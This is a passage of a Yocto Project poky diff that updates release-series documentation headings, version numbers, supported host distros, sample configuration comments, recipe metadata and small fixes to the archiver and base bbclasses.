109- :yocto_docs:`1.8 Documentation </1.8>` 149- :yocto_docs:`1.8 Documentation </1.8>`
@@ -111,7 +151,7 @@
111- :yocto_docs:`1.8.2 Documentation </1.8.2>` 151- :yocto_docs:`1.8.2 Documentation </1.8.2>`
112 152
113************************** 153**************************
1141.7 'dizzy' Release Series 154Release Series 1.7 (dizzy)
115************************** 155**************************
116 156
117- :yocto_docs:`1.7 Documentation </1.7>` 157- :yocto_docs:`1.7 Documentation </1.7>`
@@ -120,16 +160,16 @@
120- :yocto_docs:`1.7.3 Documentation </1.7.3>` 160- :yocto_docs:`1.7.3 Documentation </1.7.3>`
121 161
122************************** 162**************************
1231.6 'daisy' Release Series 163Release Series 1.6 (daisy)
124************************** 164**************************
125 165
126- :yocto_docs:`1.6 Documentation </1.6>` 166- :yocto_docs:`1.6 Documentation </1.6>`
127- :yocto_docs:`1.6.1 Documentation </1.6.1>` 167- :yocto_docs:`1.6.1 Documentation </1.6.1>`
128- :yocto_docs:`1.6.2 Documentation </1.6.2>` 168- :yocto_docs:`1.6.2 Documentation </1.6.2>`
129- :yocto_docs:`1.6.3 Documentation </1.6.3>` 169- :yocto_docs:`1.6.3 Documentation </1.6.3>`
130 170
131************************* 171*************************
1321.5 'dora' Release Series 172Release Series 1.5 (dora)
133************************* 173*************************
134 174
135- :yocto_docs:`1.5 Documentation </1.5>` 175- :yocto_docs:`1.5 Documentation </1.5>`
@@ -139,7 +179,7 @@
139- :yocto_docs:`1.5.4 Documentation </1.5.4>` 179- :yocto_docs:`1.5.4 Documentation </1.5.4>`
140 180
141************************** 181**************************
1421.4 'dylan' Release Series 182Release Series 1.4 (dylan)
143************************** 183**************************
144 184
145- :yocto_docs:`1.4 Documentation </1.4>` 185- :yocto_docs:`1.4 Documentation </1.4>`
@@ -148,9 +188,9 @@
148- :yocto_docs:`1.4.3 Documentation </1.4.3>` 188- :yocto_docs:`1.4.3 Documentation </1.4.3>`
149- :yocto_docs:`1.4.4 Documentation </1.4.4>` 189- :yocto_docs:`1.4.4 Documentation </1.4.4>`
150- :yocto_docs:`1.4.5 Documentation </1.4.5>` 190- :yocto_docs:`1.4.5 Documentation </1.4.5>`
151 191
152************************** 192**************************
1531.3 'danny' Release Series 193Release Series 1.3 (danny)
154************************** 194**************************
155 195
156- :yocto_docs:`1.3 Documentation </1.3>` 196- :yocto_docs:`1.3 Documentation </1.3>`
@@ -158,7 +198,7 @@
158- :yocto_docs:`1.3.2 Documentation </1.3.2>` 198- :yocto_docs:`1.3.2 Documentation </1.3.2>`
159 199
160*************************** 200***************************
1611.2 'denzil' Release Series 201Release Series 1.2 (denzil)
162*************************** 202***************************
163 203
164- :yocto_docs:`1.2 Documentation </1.2>` 204- :yocto_docs:`1.2 Documentation </1.2>`
@@ -166,7 +206,7 @@
166- :yocto_docs:`1.2.2 Documentation </1.2.2>` 206- :yocto_docs:`1.2.2 Documentation </1.2.2>`
167 207
168*************************** 208***************************
1691.1 'edison' Release Series 209Release Series 1.1 (edison)
170*************************** 210***************************
171 211
172- :yocto_docs:`1.1 Documentation </1.1>` 212- :yocto_docs:`1.1 Documentation </1.1>`
@@ -174,7 +214,7 @@
174- :yocto_docs:`1.1.2 Documentation </1.1.2>` 214- :yocto_docs:`1.1.2 Documentation </1.1.2>`
175 215
176**************************** 216****************************
1771.0 'bernard' Release Series 217Release Series 1.0 (bernard)
178**************************** 218****************************
179 219
180- :yocto_docs:`1.0 Documentation </1.0>` 220- :yocto_docs:`1.0 Documentation </1.0>`
@@ -182,7 +222,7 @@
182- :yocto_docs:`1.0.2 Documentation </1.0.2>` 222- :yocto_docs:`1.0.2 Documentation </1.0.2>`
183 223
184**************************** 224****************************
1850.9 'laverne' Release Series 225Release Series 0.9 (laverne)
186**************************** 226****************************
187 227
188- :yocto_docs:`0.9 Documentation </0.9>` 228- :yocto_docs:`0.9 Documentation </0.9>`
diff --git a/documentation/sphinx-static/switchers.js b/documentation/sphinx-static/switchers.js
index b28d91c080..1d65fa7fae 100644
--- a/documentation/sphinx-static/switchers.js
+++ b/documentation/sphinx-static/switchers.js
@@ -2,8 +2,11 @@
2 'use strict'; 2 'use strict';
3 3
4 var all_versions = { 4 var all_versions = {
5 'dev': 'dev (3.2)', 5 'dev': 'dev (3.5)',
6 '3.1.3': '3.1.3', 6 '3.4.1': '3.4.1',
7 '3.3.4': '3.3.4',
8 '3.2.4': '3.2.4',
9 '3.1.14': '3.1.14',
7 '3.0.4': '3.0.4', 10 '3.0.4': '3.0.4',
8 '2.7.4': '2.7.4', 11 '2.7.4': '2.7.4',
9 }; 12 };
diff --git a/documentation/toaster-manual/toaster-manual-reference.rst b/documentation/toaster-manual/toaster-manual-reference.rst
index e5e3531e83..bd3a060eee 100644
--- a/documentation/toaster-manual/toaster-manual-reference.rst
+++ b/documentation/toaster-manual/toaster-manual-reference.rst
@@ -173,13 +173,13 @@ As shipped, Toaster is configured to work with the following releases:
173- *Yocto Project &DISTRO; "&DISTRO_NAME;" or OpenEmbedded "&DISTRO_NAME;":* 173- *Yocto Project &DISTRO; "&DISTRO_NAME;" or OpenEmbedded "&DISTRO_NAME;":*
174 This release causes your Toaster projects to build against the head 174 This release causes your Toaster projects to build against the head
175 of the &DISTRO_NAME_NO_CAP; branch at 175 of the &DISTRO_NAME_NO_CAP; branch at
176 https://git.yoctoproject.org/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP; or 176 :yocto_git:`/cgit/cgit.cgi/poky/log/?h=&DISTRO_NAME_NO_CAP;` or
177 http://git.openembedded.org/openembedded-core/commit/?h=&DISTRO_NAME_NO_CAP;. 177 http://git.openembedded.org/openembedded-core/commit/?h=&DISTRO_NAME_NO_CAP;.
178 178
179- *Yocto Project "Master" or OpenEmbedded "Master":* This release 179- *Yocto Project "Master" or OpenEmbedded "Master":* This release
180 causes your Toaster Projects to build against the head of the master 180 causes your Toaster Projects to build against the head of the master
181 branch, which is where active development takes place, at 181 branch, which is where active development takes place, at
182 https://git.yoctoproject.org/cgit/cgit.cgi/poky/log/ or 182 :yocto_git:`/cgit/cgit.cgi/poky/log/` or
183 http://git.openembedded.org/openembedded-core/log/. 183 http://git.openembedded.org/openembedded-core/log/.
184 184
185- *Local Yocto Project or Local OpenEmbedded:* This release causes your 185- *Local Yocto Project or Local OpenEmbedded:* This release causes your
diff --git a/meta-poky/conf/distro/poky-tiny.conf b/meta-poky/conf/distro/poky-tiny.conf
index c6d4b88f83..f20cd4ced2 100644
--- a/meta-poky/conf/distro/poky-tiny.conf
+++ b/meta-poky/conf/distro/poky-tiny.conf
@@ -38,7 +38,7 @@ TCLIBC = "musl"
38# Distro config is evaluated after the machine config, so we have to explicitly 38# Distro config is evaluated after the machine config, so we have to explicitly
39# set the kernel provider to override a machine config. 39# set the kernel provider to override a machine config.
40PREFERRED_PROVIDER_virtual/kernel = "linux-yocto-tiny" 40PREFERRED_PROVIDER_virtual/kernel = "linux-yocto-tiny"
41PREFERRED_VERSION_linux-yocto-tiny ?= "5.0%" 41PREFERRED_VERSION_linux-yocto-tiny ?= "5.4%"
42 42
43# We can use packagegroup-core-boot, but in the future we may need a new packagegroup-core-tiny 43# We can use packagegroup-core-boot, but in the future we may need a new packagegroup-core-tiny
44#POKY_DEFAULT_EXTRA_RDEPENDS += "packagegroup-core-boot" 44#POKY_DEFAULT_EXTRA_RDEPENDS += "packagegroup-core-boot"
diff --git a/meta-poky/conf/distro/poky.conf b/meta-poky/conf/distro/poky.conf
index 521109bd05..25b0c8e608 100644
--- a/meta-poky/conf/distro/poky.conf
+++ b/meta-poky/conf/distro/poky.conf
@@ -1,6 +1,6 @@
1DISTRO = "poky" 1DISTRO = "poky"
2DISTRO_NAME = "Poky (Yocto Project Reference Distro)" 2DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
3DISTRO_VERSION = "3.1.6" 3DISTRO_VERSION = "3.1.33"
4DISTRO_CODENAME = "dunfell" 4DISTRO_CODENAME = "dunfell"
5SDK_VENDOR = "-pokysdk" 5SDK_VENDOR = "-pokysdk"
6SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}" 6SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${DATE}', 'snapshot')}"
@@ -24,7 +24,7 @@ DISTRO_FEATURES ?= "${DISTRO_FEATURES_DEFAULT} ${POKY_DEFAULT_DISTRO_FEATURES}"
24PREFERRED_VERSION_linux-yocto ?= "5.4%" 24PREFERRED_VERSION_linux-yocto ?= "5.4%"
25 25
26SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}" 26SDK_NAME = "${DISTRO}-${TCLIBC}-${SDKMACHINE}-${IMAGE_BASENAME}-${TUNE_PKGARCH}-${MACHINE}"
27SDKPATH = "/opt/${DISTRO}/${SDK_VERSION}" 27SDKPATHINSTALL = "/opt/${DISTRO}/${SDK_VERSION}"
28 28
29DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}" 29DISTRO_EXTRA_RDEPENDS += " ${POKY_DEFAULT_EXTRA_RDEPENDS}"
30DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}" 30DISTRO_EXTRA_RRECOMMENDS += " ${POKY_DEFAULT_EXTRA_RRECOMMENDS}"
@@ -39,33 +39,17 @@ DISTRO_EXTRA_RDEPENDS_append_qemux86-64 = " ${POKYQEMUDEPS}"
39 39
40TCLIBCAPPEND = "" 40TCLIBCAPPEND = ""
41 41
42PREMIRRORS ??= "\
43bzr://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
44cvs://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
45git://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
46gitsm://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
47hg://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
48osc://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
49p4://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n \
50svn://.*/.* http://downloads.yoctoproject.org/mirror/sources/ \n"
51
52SANITY_TESTED_DISTROS ?= " \ 42SANITY_TESTED_DISTROS ?= " \
53 poky-2.7 \n \ 43 poky-2.7 \n \
54 poky-3.0 \n \ 44 poky-3.0 \n \
55 poky-3.1 \n \ 45 poky-3.1 \n \
56 ubuntu-16.04 \n \
57 ubuntu-18.04 \n \ 46 ubuntu-18.04 \n \
58 ubuntu-19.04 \n \
59 ubuntu-20.04 \n \ 47 ubuntu-20.04 \n \
60 fedora-30 \n \ 48 ubuntu-22.04 \n \
61 fedora-31 \n \ 49 fedora-37 \n \
62 fedora-32 \n \ 50 debian-11 \n \
63 centos-7 \n \ 51 opensuseleap-15.3 \n \
64 centos-8 \n \ 52 almalinux-8.8 \n \
65 debian-8 \n \
66 debian-9 \n \
67 debian-10 \n \
68 opensuseleap-15.1 \n \
69 " 53 "
70# add poky sanity bbclass 54# add poky sanity bbclass
71INHERIT += "poky-sanity" 55INHERIT += "poky-sanity"
diff --git a/meta-poky/conf/local.conf.sample b/meta-poky/conf/local.conf.sample
index b555f1d21e..ea37a801aa 100644
--- a/meta-poky/conf/local.conf.sample
+++ b/meta-poky/conf/local.conf.sample
@@ -231,7 +231,7 @@ BB_DISKMON_DIRS ??= "\
231# present in the cache. It assumes you can download something faster than you can build it 231# present in the cache. It assumes you can download something faster than you can build it
232# which will depend on your network. 232# which will depend on your network.
233# 233#
234#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/2.5/PATH;downloadfilename=PATH" 234#SSTATE_MIRRORS ?= "file://.* http://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
235 235
236# 236#
237# Qemu configuration 237# Qemu configuration
diff --git a/meta-poky/conf/local.conf.sample.extended b/meta-poky/conf/local.conf.sample.extended
index dc92a16f6c..9e857360ae 100644
--- a/meta-poky/conf/local.conf.sample.extended
+++ b/meta-poky/conf/local.conf.sample.extended
@@ -328,7 +328,7 @@ DISTRO_FEATURES_remove = "x11"
328# The INITRAMFS_IMAGE image variable will cause an additional recipe to 328# The INITRAMFS_IMAGE image variable will cause an additional recipe to
329# be built as a dependency to the what ever rootfs recipe you might be 329# be built as a dependency to the what ever rootfs recipe you might be
330# using such as core-image-sato. The initramfs might be needed for 330# using such as core-image-sato. The initramfs might be needed for
331# the initial boot of of the target system such as to load kernel 331# the initial boot of the target system such as to load kernel
332# modules prior to mounting the root file system. 332# modules prior to mounting the root file system.
333# 333#
334# INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe 334# INITRAMFS_IMAGE_BUNDLE variable controls if the image recipe
@@ -368,20 +368,9 @@ DISTRO_FEATURES_remove = "x11"
368# 368#
369 369
370# 370#
371# Use busybox/mdev for system initialization 371# System initialization
372# 372#
373#VIRTUAL-RUNTIME_dev_manager = "busybox-mdev" 373#INIT_MANAGER = "none"
374#VIRTUAL-RUNTIME_login_manager = "busybox" 374#INIT_MANAGER = "sysvinit"
375#VIRTUAL-RUNTIME_init_manager = "busybox" 375#INIT_MANAGER = "systemd"
376#VIRTUAL-RUNTIME_initscripts = "initscripts" 376#INIT_MANAGER = "mdev-busybox"
377#VIRTUAL-RUNTIME_keymaps = "keymaps"
378#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
379
380#
381# Use systemd for system initialization
382#
383#DISTRO_FEATURES_append = " systemd"
384#DISTRO_FEATURES_BACKFILL_CONSIDERED += "sysvinit"
385#VIRTUAL-RUNTIME_login_manager = "shadow-base"
386#VIRTUAL-RUNTIME_init_manager = "systemd"
387#VIRTUAL-RUNTIME_initscripts = "systemd-compat-units"
diff --git a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
index 9f905a5198..dcf6c8ba63 100644
--- a/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
+++ b/meta-selftest/recipes-test/aspell/aspell_0.0.0.1.bb
@@ -4,6 +4,7 @@
4 4
5SUMMARY = "GNU Aspell spell-checker" 5SUMMARY = "GNU Aspell spell-checker"
6SECTION = "console/utils" 6SECTION = "console/utils"
7HOMEPAGE = "https://ftp.gnu.org/gnu/aspell/"
7 8
8LICENSE = "LGPLv2 | LGPLv2.1" 9LICENSE = "LGPLv2 | LGPLv2.1"
9LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34" 10LIC_FILES_CHKSUM = "file://COPYING;md5=7fbc338309ac38fefcd64b04bb903e34"
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
index 07b83276fb..8a27e3a791 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb
@@ -11,7 +11,7 @@ SRCREV = "1a3e1343761b30750bed70e0fd688f6d3c7b3717"
11PV = "0.1+git${SRCPV}" 11PV = "0.1+git${SRCPV}"
12PR = "r2" 12PR = "r2"
13 13
14SRC_URI = "git://git.yoctoproject.org/dbus-wait" 14SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
15UPSTREAM_CHECK_COMMITS = "1" 15UPSTREAM_CHECK_COMMITS = "1"
16RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" 16RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
17 17
diff --git a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
index 32ec4b14fa..fbe90d6c6b 100644
--- a/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
+++ b/meta-selftest/recipes-test/devtool/devtool-upgrade-test2_git.bb.upgraded
@@ -10,7 +10,7 @@ DEPENDS = "dbus"
10SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517" 10SRCREV = "6cc6077a36fe2648a5f993fe7c16c9632f946517"
11PV = "0.1+git${SRCPV}" 11PV = "0.1+git${SRCPV}"
12 12
13SRC_URI = "git://git.yoctoproject.org/dbus-wait" 13SRC_URI = "git://git.yoctoproject.org/dbus-wait;branch=master"
14UPSTREAM_CHECK_COMMITS = "1" 14UPSTREAM_CHECK_COMMITS = "1"
15RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature" 15RECIPE_NO_UPDATE_REASON = "This recipe is used to test devtool upgrade feature"
16 16
diff --git a/meta-selftest/recipes-test/images/oe-selftest-image.bb b/meta-selftest/recipes-test/images/oe-selftest-image.bb
index 5d4d10eef6..6246aae910 100644
--- a/meta-selftest/recipes-test/images/oe-selftest-image.bb
+++ b/meta-selftest/recipes-test/images/oe-selftest-image.bb
@@ -1,6 +1,6 @@
1SUMMARY = "An image used during oe-selftest tests" 1SUMMARY = "An image used during oe-selftest tests"
2 2
3IMAGE_INSTALL = "packagegroup-core-boot dropbear" 3IMAGE_INSTALL = "packagegroup-core-boot packagegroup-core-ssh-dropbear"
4IMAGE_FEATURES = "debug-tweaks" 4IMAGE_FEATURES = "debug-tweaks"
5 5
6IMAGE_LINGUAS = " " 6IMAGE_LINGUAS = " "
diff --git a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
index 0cd0494da8..fd113b5ec5 100644
--- a/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
+++ b/meta-selftest/recipes-test/recipeutils/recipeutils-test_1.2.bb
@@ -2,7 +2,7 @@ SUMMARY = "Test recipe for recipeutils.patch_recipe()"
2 2
3require recipeutils-test.inc 3require recipeutils-test.inc
4 4
5LICENSE = "Proprietary" 5LICENSE = "HPND"
6LIC_FILES_CHKSUM = "file://${WORKDIR}/somefile;md5=d41d8cd98f00b204e9800998ecf8427e" 6LIC_FILES_CHKSUM = "file://${WORKDIR}/somefile;md5=d41d8cd98f00b204e9800998ecf8427e"
7DEPENDS += "zlib" 7DEPENDS += "zlib"
8 8
diff --git a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
index d8633702fc..8db57f202e 100644
--- a/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
+++ b/meta-skeleton/recipes-baremetal/baremetal-examples/baremetal-helloworld_git.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Baremetal examples to work with the several QEMU architectures supported on OpenEmbedded" 1SUMMARY = "Baremetal examples to work with the several QEMU architectures supported on OpenEmbedded"
2HOMEPAGE = "https://github.com/aehs29/baremetal-helloqemu" 2HOMEPAGE = "https://github.com/aehs29/baremetal-helloqemu"
3DESCRIPTION = "These are introductory examples to showcase the use of QEMU to run baremetal applications."
3LICENSE = "MIT" 4LICENSE = "MIT"
4LIC_FILES_CHKSUM = "file://LICENSE;md5=39346640a23c701e4f459e05f56f4449" 5LIC_FILES_CHKSUM = "file://LICENSE;md5=39346640a23c701e4f459e05f56f4449"
5 6
diff --git a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
index 3d33446500..bc9acccd5f 100644
--- a/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
+++ b/meta-skeleton/recipes-kernel/hello-mod/hello-mod_0.1.bb
@@ -1,4 +1,5 @@
1SUMMARY = "Example of how to build an external Linux kernel module" 1SUMMARY = "Example of how to build an external Linux kernel module"
2DESCRIPTION = "${SUMMARY}"
2LICENSE = "GPLv2" 3LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e" 4LIC_FILES_CHKSUM = "file://COPYING;md5=12f884d2ae1ff87c09e5b7ccc2c4ca7e"
4 5
diff --git a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
index 6194d4f8da..d53f9c7a40 100644
--- a/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
+++ b/meta-skeleton/recipes-kernel/linux/linux-yocto-custom.bb
@@ -1,6 +1,6 @@
1SUMMARY = "An example kernel recipe that uses the linux-yocto and oe-core"
1# linux-yocto-custom.bb: 2# linux-yocto-custom.bb:
2# 3#
3# An example kernel recipe that uses the linux-yocto and oe-core
4# kernel classes to apply a subset of yocto kernel management to git 4# kernel classes to apply a subset of yocto kernel management to git
5# managed kernel repositories. 5# managed kernel repositories.
6# 6#
diff --git a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
index f13186f933..e7d50aefda 100644
--- a/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
+++ b/meta-skeleton/recipes-multilib/images/core-image-multilib-example.bb
@@ -1,5 +1,4 @@
1# 1SUMMARY = "An example of a multilib image"
2# An example of a multilib image
3# 2#
4# This example includes a lib32 version of bash into an otherwise standard 3# This example includes a lib32 version of bash into an otherwise standard
5# sato image. It assumes a "lib32" multilib has been enabled in the user's 4# sato image. It assumes a "lib32" multilib has been enabled in the user's
diff --git a/meta-skeleton/recipes-skeleton/service/service_0.1.bb b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
index 6416618dcb..669d173ad1 100644
--- a/meta-skeleton/recipes-skeleton/service/service_0.1.bb
+++ b/meta-skeleton/recipes-skeleton/service/service_0.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "The canonical example of init scripts" 1SUMMARY = "The canonical example of init scripts"
2SECTION = "base" 2SECTION = "base"
3DESCRIPTION = "This recipe is a canonical example of init scripts"
3LICENSE = "GPLv2" 4LICENSE = "GPLv2"
4LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYRIGHT;md5=349c872e0066155e1818b786938876a4" 5LIC_FILES_CHKSUM = "file://${WORKDIR}/COPYRIGHT;md5=349c872e0066155e1818b786938876a4"
5 6
diff --git a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
index 9c37f91bc1..fbe039aa95 100644
--- a/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
+++ b/meta-yocto-bsp/recipes-kernel/linux/linux-yocto_5.4.bbappend
@@ -7,8 +7,8 @@ KMACHINE_genericx86 ?= "common-pc"
7KMACHINE_genericx86-64 ?= "common-pc-64" 7KMACHINE_genericx86-64 ?= "common-pc-64"
8KMACHINE_beaglebone-yocto ?= "beaglebone" 8KMACHINE_beaglebone-yocto ?= "beaglebone"
9 9
10SRCREV_machine_genericx86 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" 10SRCREV_machine_genericx86 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
11SRCREV_machine_genericx86-64 ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" 11SRCREV_machine_genericx86-64 ?= "35826e154ee014b64ccfa0d1f12d36b8f8a75939"
12SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" 12SRCREV_machine_edgerouter ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
13SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd" 13SRCREV_machine_beaglebone-yocto ?= "706efec4c1e270ec5dda92275898cd465dfdc7dd"
14 14
@@ -17,7 +17,7 @@ COMPATIBLE_MACHINE_genericx86-64 = "genericx86-64"
17COMPATIBLE_MACHINE_edgerouter = "edgerouter" 17COMPATIBLE_MACHINE_edgerouter = "edgerouter"
18COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto" 18COMPATIBLE_MACHINE_beaglebone-yocto = "beaglebone-yocto"
19 19
20LINUX_VERSION_genericx86 = "5.4.58" 20LINUX_VERSION_genericx86 = "5.4.219"
21LINUX_VERSION_genericx86-64 = "5.4.58" 21LINUX_VERSION_genericx86-64 = "5.4.219"
22LINUX_VERSION_edgerouter = "5.4.58" 22LINUX_VERSION_edgerouter = "5.4.58"
23LINUX_VERSION_beaglebone-yocto = "5.4.58" 23LINUX_VERSION_beaglebone-yocto = "5.4.58"
diff --git a/meta/classes/archiver.bbclass b/meta/classes/archiver.bbclass
index 7ca35a573b..6ead010fe1 100644
--- a/meta/classes/archiver.bbclass
+++ b/meta/classes/archiver.bbclass
@@ -54,9 +54,10 @@ ARCHIVER_MODE[mirror] ?= "split"
54 54
55DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources" 55DEPLOY_DIR_SRC ?= "${DEPLOY_DIR}/sources"
56ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources" 56ARCHIVER_TOPDIR ?= "${WORKDIR}/archiver-sources"
57ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${TARGET_SYS}/${PF}/" 57ARCHIVER_ARCH = "${TARGET_SYS}"
58ARCHIVER_OUTDIR = "${ARCHIVER_TOPDIR}/${ARCHIVER_ARCH}/${PF}/"
58ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm" 59ARCHIVER_RPMTOPDIR ?= "${WORKDIR}/deploy-sources-rpm"
59ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${TARGET_SYS}/${PF}/" 60ARCHIVER_RPMOUTDIR = "${ARCHIVER_RPMTOPDIR}/${ARCHIVER_ARCH}/${PF}/"
60ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/" 61ARCHIVER_WORKDIR = "${WORKDIR}/archiver-work/"
61 62
62# When producing a combined mirror directory, allow duplicates for the case 63# When producing a combined mirror directory, allow duplicates for the case
@@ -100,6 +101,10 @@ python () {
100 bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn) 101 bb.debug(1, 'archiver: %s is excluded, covered by gcc-source' % pn)
101 return 102 return
102 103
104 # TARGET_SYS in ARCHIVER_ARCH will break the stamp for gcc-source in multiconfig
105 if pn.startswith('gcc-source'):
106 d.setVar('ARCHIVER_ARCH', "allarch")
107
103 def hasTask(task): 108 def hasTask(task):
104 return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False)) 109 return bool(d.getVarFlag(task, "task", False)) and not bool(d.getVarFlag(task, "noexec", False))
105 110
@@ -281,7 +286,10 @@ python do_ar_configured() {
281 # ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the 286 # ${STAGING_DATADIR}/aclocal/libtool.m4, so we can't re-run the
282 # do_configure, we archive the already configured ${S} to 287 # do_configure, we archive the already configured ${S} to
283 # instead of. 288 # instead of.
284 elif pn != 'libtool-native': 289 # The kernel class functions require it to be on work-shared, we
290 # don't unpack, patch, configure again, just archive the already
291 # configured ${S}
292 elif not (pn == 'libtool-native' or is_work_shared(d)):
285 def runTask(task): 293 def runTask(task):
286 prefuncs = d.getVarFlag(task, 'prefuncs') or '' 294 prefuncs = d.getVarFlag(task, 'prefuncs') or ''
287 for func in prefuncs.split(): 295 for func in prefuncs.split():
@@ -484,6 +492,9 @@ python do_unpack_and_patch() {
484 src_orig = '%s.orig' % src 492 src_orig = '%s.orig' % src
485 oe.path.copytree(src, src_orig) 493 oe.path.copytree(src, src_orig)
486 494
495 if bb.data.inherits_class('dos2unix', d):
496 bb.build.exec_func('do_convert_crlf_to_lf', d)
497
487 # Make sure gcc and kernel sources are patched only once 498 # Make sure gcc and kernel sources are patched only once
488 if not (d.getVar('SRC_URI') == "" or is_work_shared(d)): 499 if not (d.getVar('SRC_URI') == "" or is_work_shared(d)):
489 bb.build.exec_func('do_patch', d) 500 bb.build.exec_func('do_patch', d)
@@ -572,7 +583,7 @@ python do_dumpdata () {
572 583
573SSTATETASKS += "do_deploy_archives" 584SSTATETASKS += "do_deploy_archives"
574do_deploy_archives () { 585do_deploy_archives () {
575 echo "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}." 586 bbnote "Deploying source archive files from ${ARCHIVER_TOPDIR} to ${DEPLOY_DIR_SRC}."
576} 587}
577python do_deploy_archives_setscene () { 588python do_deploy_archives_setscene () {
578 sstate_setscene(d) 589 sstate_setscene(d)
diff --git a/meta/classes/base.bbclass b/meta/classes/base.bbclass
index 8a1b5f79c1..3cae577a0e 100644
--- a/meta/classes/base.bbclass
+++ b/meta/classes/base.bbclass
@@ -122,6 +122,10 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
122 tools = d.getVar(toolsvar).split() 122 tools = d.getVar(toolsvar).split()
123 origbbenv = d.getVar("BB_ORIGENV", False) 123 origbbenv = d.getVar("BB_ORIGENV", False)
124 path = origbbenv.getVar("PATH") 124 path = origbbenv.getVar("PATH")
125 # Need to ignore our own scripts directories to avoid circular links
126 for p in path.split(":"):
127 if p.endswith("/scripts"):
128 path = path.replace(p, "/ignoreme")
125 bb.utils.mkdirhier(dest) 129 bb.utils.mkdirhier(dest)
126 notfound = [] 130 notfound = []
127 for tool in tools: 131 for tool in tools:
@@ -135,7 +139,7 @@ def setup_hosttools_dir(dest, toolsvar, d, fatal=True):
135 # /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc) 139 # /usr/local/bin/ccache/gcc -> /usr/bin/ccache, then which(gcc)
136 # would return /usr/local/bin/ccache/gcc, but what we need is 140 # would return /usr/local/bin/ccache/gcc, but what we need is
